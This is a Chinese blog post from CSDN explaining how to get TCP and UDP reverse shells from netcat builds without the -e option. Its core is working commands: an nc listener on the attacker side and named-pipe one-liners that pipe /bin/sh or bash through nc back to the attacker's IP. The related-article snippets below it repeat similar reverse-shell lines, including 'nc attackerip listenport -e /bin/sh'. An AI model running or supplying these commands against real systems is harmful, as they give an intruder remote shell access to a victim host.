NC不用-e建立TCP/UDP 反弹连接shell

最新推荐文章于 2023-11-10 14:18:22 发布
最新推荐文章于 2023-11-10 14:18:22 发布
阅读量1.3k 收藏 4
点赞数 2
分类专栏: 网络安全 文章标签: netcat nc shell tcp udp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhang35/article/details/105771610
版权

主机1监听端口,主机2发起连接。

TCP shell

主机1:

nc -nvlp 4444

主机2:

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 主机1的IP 4444 1>/tmp/backpipe

如果第一步提示文件backpipe存在,且无法建立连接,则可以先把它删了重试:

rm /tmp/backpipe

UDP shell

攻击机:

nc -nuvlp 4444

靶机:

mkfifo fifo
nc -u 主机1的IP 4444 < fifo |
{ 
  echo "Hi"
  bash
} > fifo
zhang35
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
常用的反弹shell总结
西部壮仔的博客
03-24 1277
nc反弹shell 我们已经拿下主机的一个webshell,我们想获取一个可以直接操作主机的虚拟终端,此时我们首先想到的是开启一个shell监听,这种场景比较简单,我们直接使用使用nc即可开启,如果没有nc我们也可以很轻松的直接下载安装一个,具体开启监听的命令如下。 这里需要注意一点默认的各个linux发行版本已经自带了netcat工具包,但是可能由于处于安全考虑原生版本的netcat带有可以直接...
nc反弹php,NC不使用-e选项反弹shell
weixin_31108679的博客
04-12 646
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没...
[TIP]NC不使用-e选项反弹shell
weixin_34315189的博客
11-16 822
【转自】http://www.2cto.com/article/201305/209914.html 攻击方执行: 1 nc-lnvp4430 被攻击方执行: 1 2 mknod/tmp/backpipep /bin/sh0</tmp/backpipe|nc192.168.xx.xx4...
NC不使用-e选项反弹shell
weixin_34352449的博客
06-25 2377
对于瑞士×××nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在***测试过程中如果想反弹shell我们通常的做法是:Attacker: nc -lnvp listenportVictim: nc attackerip listenport -e /bin/sh在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的n...
关于nc无法使用-e参数 nc:invalid option -- ‘e’
tonine9的博客
07-24 3390
关于nc无法使用-e参数,解决方法。安装之后,由于ubuntu默认安装的是netcat-openbsd,选择/bin/nc.traditional的编号。nc老版本是不能采用-e这个参数的。
netcat没有-e选项解决方法(反弹shell用法)
qq_50854662的博客
11-10 320
netcat没有-e选项
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
最新发布
04-16
Socat 是 Linux 下的一个多功能的网络工具,名字来由是 「Socket CAT」。其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版...另一端主机用nc 【android设备IP】:10001进行连接即可远程 android shell
NC代码.rar
12-25
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc -L -p 80 > c:\...
NC原版与VC60版本
07-18
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令”<”、”>”等等命令功能更强大……)。 ================...
NC源码和程序附上目前最详细的使用手册和使用技巧
05-12
讲解:绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口 以上为最基本的几种用法(其实NC的用法还有很多, 当配合管道命令”|”与重定向命令”<”、”>”等等命令功能更强大……)。 =========...
docker-netcat:“ netcat”容器,网络工具的瑞士军刀,已被Dockerized!
05-08
在这种情况下,此netcat容器将打开2个适合侦听TCP / UDP流量的端口。 有关netcat更多信息,请查看此页面: :用法1)构建并运行netcat Docker容器$ git clone https://github.com/chilcano/docker-netcat.git$ cd ...
Socket的TCPUDP连接学习以及实现远程shell反弹
weujie
05-08 544
Socket 学习的视频:https://www.bilibili.com/video/BV1UJ411M7tx?p=2 TCP连接:可靠的、收发数据前 需要建立连接,三次握手。 UDP:不可靠的,不需要建立连接 创建套接字 socket.socket(family[,type[,port]) family 可使用AF_UNIX 或者AF_INET AF_INET 使用IPV4 协议 AF_INET6 使用ipv6协议 type 类型,可以是面向连接还是非连接的 . SOCK_STREAM
Shell netcat / nc 命令
水木梵华
04-12 2528
Shell 中的netcat / nc 命令 1、概述 2、语法 3、用法示例 Shell 中的netcat / nc 命令 Note: 本篇中服务器地址使用的是服务器节点的主机名: yanta 和 node 1、概述 netcat 所做的就是在两台电脑之间建立链接并返回两个数据流,可以使用这个命令来传输数据文件等。不过今天主要说明这个命令在shell脚本中的使用,可...
Windows的几种常用反弹shell方法
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
exit()和_exit()两个函数的区别
happylzs2008的专栏
10-27 282
https://blog.csdn.net/kang___xi/article/details/80545510 exit()和_exit()这两个函数都是用于函数退出,但这两者有一些细微的差别,在exit()函数里会调用_exit()函数。下面来看看exit()的函数代码大概: void exit(int status) { while(_exit_funcs != NULL) ...
nc (NetCat) 网络安全工具介绍
cavalier的学习之路
05-04 9172
搞系统安全的人,可能没人没听说过大名鼎鼎的nc吧,它可以代替telnet,可以启监听程序,可以用来传输文件,可以用来作为黑客辅助程序,深受大量hacker的喜爱,其功能有如瑞士军刀般好用。 NetCat是一个非常简单的Unix工具,可以读、写TCPUDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动
nmap和netcat的使用教程
weixin_43778499的博客
08-01 790
nmap和netcat使用教程
使用netcat(nc命令)发送udp
热门推荐
开心就好的专栏
04-29 4万+
向192.168.31.65的2055端口发送udp测试数据 echo "Hello World\!" | nc -4u 192.168.31.65 2055
shell脚本批量测试TCP/UDP端口,通过telnet或者nc命令测试
gonepoo的博客
12-19 2935
tcp端口测试用telnet #!/bin/bash for line in `cat iplist.txt | grep -v ^# |grep -v ^$` do ip=`echo $line | awk 'BEGIN{FS="|"} {print $1}'` port=`echo $line | awk 'BEGIN{FS="|"} {print $2}'` ...
docker exec -i playwright /bin/bash -c "cd /var/plawright/erp-spider-more/NC/test_case/ && python NC_bernoe.py" 每个命令的详解
07-14
`/bin/bash` 是一个常见的 Shell 程序,`-c` 选项允许您在命令行中指定要执行的命令。 `"cd /var/plawright/erp-spider-more/NC/test_case/ && python NC_bernoe.py"` - 这是要在容器中执行的命令。首先,通过 `cd`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值